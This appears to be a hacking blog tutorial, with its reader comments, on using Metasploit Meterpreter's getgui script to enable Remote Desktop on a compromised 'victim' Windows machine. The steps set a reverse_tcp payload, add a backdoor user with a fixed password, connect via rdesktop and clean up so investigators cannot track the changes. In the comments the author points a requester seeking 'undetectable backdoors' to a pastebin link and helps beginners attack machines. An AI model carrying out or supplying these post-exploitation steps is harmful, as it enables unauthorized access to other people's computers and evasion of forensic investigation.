• 6,587
  • 91
  • +334
  • 227
5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Bookmark

Type : Tutorial

Level : Beginner, Medium

Last year when I'm teaching about computer security class, one student come and ask "can you give me simple tutorial how to use command prompt?", then I say "I don't think so it will be do in a short course because learning about command prompt you should practice everyday for first times and make it familiar like your mother tongue" from this situation I know that not every people know about command prompt or something related to console based. How about hacking?yep it's the same…sometimes newly learned they just follow tutorials, but didn't know what exactly they doing.

Today I will write simple tutorial how to enable Remote Desktop(use Remote Desktop Protocol on TCP port 3389) when you've already inside remote system using Metasploit Framework. This method should be useful if you have limitation how to use command prompt. In this case, we will utilize Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log into it with.

Requirement :

1. Metasploit Framework

2. Backtrack 5(or another linux OS)

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter :

1. My favourite meterpreter is using reverse_tcp. If you also like to use reverse_tcp for your payload, you can use like the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

to view the help.

3. To add a user with username : valent and password : r4h45i4 and then enable the Remote Desktop Service

run getgui -u valent -p r4h45i4

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Yep we already successfully created the user and activated the Remote Desktop Service.

Please note the last command "For cleanup use command : run multi_console_command….bla…bla….bla" it will be used after finish using the Remote Desktop Service of victim computer.

4. To connect to victim using remote desktop, we can use rdesktop program (it's already installed on backtrack).

rdesktop -u <username>  -p <password> <ip-address-target>

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

initializing……and then….

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

5. You also should remember that when you add user it's mean that you are adding one new user on remote computer. Be wise to use this methods, because when you do much changes, you also will left a lot of changes on remote computer and it can be tracked by investigators :-) . To clean up the user we've already created before(you can see on step 3).

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Finish…

hope it's useful for you…any question?just drop on comment box. :-)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Hagai

    Hi,
    I have a bigginers Q. :)
    where do I find the Meterpreter in BT5?

  • puppet

    how do we know the username n password of the victim???
    n do we need to add new user to the victim compter?

    • http://www.vishnuvalentino.com v4L

      #puppet
      First of all, you should find a vulnerable target…and then try to compromise it…when you successfully compromise target, you didn’t need to input any password or username :-)

  • mehdi

    i have a probleme Unknown command: rdesktop

    • http://www.vishnuvalentino.com v4L

      #mehdi
      Hmm….maybe you didn’t have rdesktop installed…try to run apt-get install rdesktop.

  • Pingback: Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution | Vishnu Valentino Hacking Tutorial, Tips and Trick

  • th3bAdh

    i have problem with rdesktop, password was invalid, but i've double check password, but still gettin error

    • http://www.vishnuvalentino.com v4L

      #th3bAdh
      hmm…if the password was correct it should have no error like this…maybe the password was empty or issue with keyboard localization..

  • vir0e5

    Thx for info….
    Download RDesktop
    http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz

  • josh

    I am using following payload:
     (windows/shell/reverse_tcp):
    but wen i run the exploit..
    after the binding, it says "Sending exploit …"
    and then it returns me ….msf  exploit(ms03_026_dcom) > 
    so nothing happens…..you know what could be the possible reason for this?
    Thanks!
     
     

    • http://www.vishnuvalentino.com v4L

      #josh
      maybe it’s mean that the target isn’t vulnerable.

  • bagus

    when i write getgui – h run , run the command it says unokwon ..
    What should I do ?

    • http://www.vishnuvalentino.com v4L

      #bagus
      did you already inside meterpreter console?

  • DeusIgni

    Whenever I attempt to create a shell in target computer, the handler is created on my end, but the connection times out. Why is that? Is it error on my end?
    -DeusIgni

    • http://www.vishnuvalentino.com v4L

      #Deuslgni
      Hmm maybe the target prevent you to create it…doesn’t mean that if you got meterpreater,you’ll also got the shell…it’s depend with the vulnerability ranking…fyi the target machine in this tutorial was XP SP0..

  • DeusIgni

    Is there a way to use this exploit on XP SP3?
    -DeusIgni

  • boby

    hi
    i am using bt5 r2 in vmware.i am trying to remotely  control my win 7 desktop.when meterpreter session -i 1 is started like
    meterpreter>
    when i enter the shell,pwd or cd command it give me error of unknoun command
    what will i do??

    • http://www.vishnuvalentino.com v4L

      #boby
      maybe the rating of exploit you use not an excellent one. btw if you want to try and make sure it work you can view this tutorial http://www./hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/

  • boby

    I m using windows/meterpreter/reverse_tcp,i have same problem.I have tried java_signed_applet i still have this problem " unknown command ".when i was using backtrack 5 r1 it was working very well
    Is there any installation problem or may have some bugs in backtrack 5 r2???

  • boby

    metertreter>pwd
    pwd unknoun command
    same problem

    • http://www.vishnuvalentino.com v4L

      #boby
      Hmmm….maybe you can try to update your metasploit framework first by using msfupdate command.

      • boby

        Thank you very mush for your reply… :)

        which tool of backtrack 5 must be update after installation??and which command i have to use???

        i am using these commands
        for msf
        =======
        1,msfupdate
        for library
        ===========
        2,apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

        which command you have suggested me to update backtrack 5 R1 or Backtrack 5 R2 for better performance?

        • http://www.vishnuvalentino.com v4L

          #boby
          btw I didn’t know the exact thing from your problem and how you install your BT. maybe you also can try to update your system using apt-get update and apt-get upgrade.

  • boby

    my problem is solve.Thanks for your help

  • deff

    what is stupidity, provide a metasploit payload when you just need to add user to a group and start a service from shell. I understand the reason you provide it but would be a lot more usefull to actually explain it than just provide script kiddies…

    • http://www.vishnuvalentino.com v4L

      #deff
      LoL…maybe what you mean is http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
      if you think like that, so why you didn’t contribute to wrote an “awesome tutorial” here? or maybe you give your own tutorial link…don’t just say and criticize without action :-P it’s just wasting your time… :-)
      ps : next time it’s better use your real e-mail not the fake one :-)
      merci monsieur

  • Puka

    I have metasploit 4.4 gui comunity edition but no change to exploit. btw i have windows 7 sp1

    • http://www.vishnuvalentino.com v4L

      #Puka
      I don’t understand?

  • anonymous

    i hv installed backtrack on vmware and hack my windows 7 system with the system intenal ip but how i can set my dynamic ip to hack computer remotely

    • http://www.vishnuvalentino.com v4L

      #anonymous
      read more here : http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Samuel

    Hi, when i tried to do the rdesktop -u ( ) -p ( ) and the ipaddress and pressed enter it says Autoselected keyboard map en-us and does not do anything…do you know why that happens?

    • http://www.vishnuvalentino.com v4L

      #samuel
      hmm…maybe your remote desktop service on victim PC haven’t started yet..
      maybe you can take a look to this tutorial : http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/

  • Thirteen

    Thanks for your time and effort to provide tutorials!

  • boby

    hi

    please giive me a toturial to hack pc on other network.please guide me

    • http://www.vishnuvalentino.com v4L

      #boby
      http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Remaro

    Like other people, I am also getting the “unknown command” error once the meterpreter prompt is up, and no commands will work. You can see it here: http://imgur.com/WK2KQ What causes this?

  • http://google.com Josh

    after executing this command :
    run getgui -u testuser -p testpass

    show me this message :
    This version of Meterpreter is not supported with this Script!

    what’s the problem?

    • http://www.vishnuvalentino.com v4L

      #josh
      maybe you can try to update the metasploit library msfupdate.

  • boby

    Hi,

    I want download vanish.sh and crypter.ph for backtrack 5 r3,I search it on google but I cannot find it.kindly give me these undectable backdoors or download link.I will be very thankful to you

    • http://www.vishnuvalentino.com v4L

      #boby
      I think you just haven’t search it :-)
      http://pastebin.com/7xmvGnks

      • boby

        No its not :D I search on net,I found the code but it didn’t work :)
        Thanks for you corporation :)

  • fahmi

    after I type set payload windows/meterpreter/reverse_tcp the meterpreter won’t to show up, why? thanks

    • http://www.vishnuvalentino.com v4L

      #fahmi

      you need to exploit 1st and can get the meterpreter console. See other hacking tutorials here http://www./category/hacking-tutorial/

  • intoxicate

    Hey, I’ve tried to use getgui through meterpreter but apparently it doesn’t add user to the remote machine. To prove this, I get on my remote host and run net command to see if any user has been added to administrator local group. But none of user has been added to that group. Since it doesn’t add a user to remote host, I cannot login via rdesktop. I’m not sure if the script is not working properly or I did something wrong.

    • http://www.vishnuvalentino.com v4L

      #intoxicate

      on victim computer, you need to have system privileges

  • sheaz

    Dear

    v4L i want to hack a server its ip is 203.128.26.xxx and remote desktop is already on. i am new in this field. please only make user in this server and please give me user name and password i am very thankful to you.

  • akbar

    I am a student from Iran ..
    thanks for your this tutorial ….!

  • GuestMan

    It is work when victim has linux?

    • http://www.hacking-tutorial.com/ v4L

      #Guestman
      no it cannot